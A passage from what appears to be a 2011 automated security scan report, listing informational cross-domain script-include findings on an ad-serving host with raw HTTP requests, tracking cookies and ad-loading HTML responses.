bh="b!!!#M!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0190.rm.sp2
Set-Cookie: ih="b!!!!#!4ZV4!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: bh="b!!!!#!$?1O!!!!#=3f9>"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: vuday1=@n$r!!79C8U9BKI; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9>=4'28!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:45:46 GMT
Set-Cookie: uid=uid=23edad00-d886-11e0-8f26-78e7d1f5d92a&_hmacv=1&_salt=3223395414&_keyid=k1&_hmac=46d1029a6a257f1cf41cff0543eaa45aa4369721; path=/; expires=Thu, 06-Oct-2011 12:45:46 GMT
Set-Cookie: lifb=M5Jkn5cn<bEff6B; path=/; expires=Tue, 06-Sep-2011 16:45:46 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:45:46 GMT
Pragma: no-cache
Content-Length: 1425
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834542);}
</script><script type="text/javascript" src="http://tags.mathtag.com/view/js/?strat=109185&cr=126412&supply=99&random=1315313146&rfr=http%3A%2F%2Fmaps%2Eyahoo%2Ecom%2Fdarla%5Ffc%3Fcb%3Dyahoo%2Eads%2Edarla%2E%5Floaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf%2D8%26rn%3D1315331124066%26em%3D%257b%2522site%2Dattribute%2522%253a%2522content%253dno%5Fexpandable%253bajax%5Fcert%5Fexpandable%2522%252c%2522ad&rfid=238934&ymct=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUMty4jAQ%2EJmFwxZYL78IpdoSYAjY5mmHJRdKtgTEGNsxImT%2Efg3epLiuDjOtnurWtBDpxgJGkYhQx%2DYc7UyziwgmMjaEvZMt2O12kQEtQjpIh62X93DA5m44Yr1L%2DB6y%2D3HXwq0RY%2EsbGNe3uX3rg%2E4UOs93nrHLR7iqh302T%2E7pa%2DI%2Eax9Nvt659Wst11QynCfj3rfZwCE%2Dniavax9664U%2DG2yUHwxTv48O08SBXhDrr4E4%2DsHLaTqaHv1vIaOtg1LFEwD7NI94qvFSaH%2E4Ic%2D1OD%2DB1XhEkVHodqESBXxq2ZZNiIZ0XTcQvAHcQbbZ0ZBpdExCwICeeHEGK4ohxoRgHepP3tLpgw3dsOfZDDi%2E5xQRZBAMqynw6N6I0it2x24eFGxZJEGqXZPF1fMPwuJH4zSUC8bC0gM9%2DnY4fCzCfLTJ8jaY1DaVF9YR0aGBgUv94ww5BLprf9GZhfYEGmO72ANGTWwijC2wpBD8%2EPGV%2DbbrQ1rBy5Rvd%2EGvOKL1H3Bx1u6stk1zLqRoFveAzd1DwGZK01LGTZnRi9q17WaZ1bsRVO0GTbMpT7RhRQ2Mz29KtrlS5Vt0UbIiGoRXNc4zJTPVICLLt%2EKz4JngUSobJOIJ%2E9zGslSPdCXDcSXj4i%2EI9dQd%2C"></script>
...[SNIP]...

16.8. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313355644217&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p035eiu/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320555/L=vf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk/B=u0uOQmKJiUo-/J=1315313355644217/K=wAUe6WLorFCi06uKuG03Mw/A=6261227/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; ih="b!!!!/!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jsp`9; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; lifb=0EA2)A9.-B!6-Nb'W00AM5Jkn/>M1M:>Rmw; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0228.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!$=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:49:19 GMT
Set-Cookie: vuday1=@n$r$BKZI(BgvR/4M6EqoyOxB!!w[/!79C8kS^YR; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; path=/; expires=Tue, 13-Sep-2011 12:48:14 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:49:19 GMT
Pragma: no-cache
Content-Length: 2881
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982309);}
</script><IFRAME SRC="htt
...[SNIP]...
&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.12;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359?">
</SCRIPT>
...[SNIP]...

16.9. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081109312&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15j13o5q5/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS/B=0F2xPtj8elw-/J=1315313081109312/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'"; vuday1=4M6Eq!79C835n]5; liday1=*YKlx!79C85[p%3; bh="b!!!#E!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M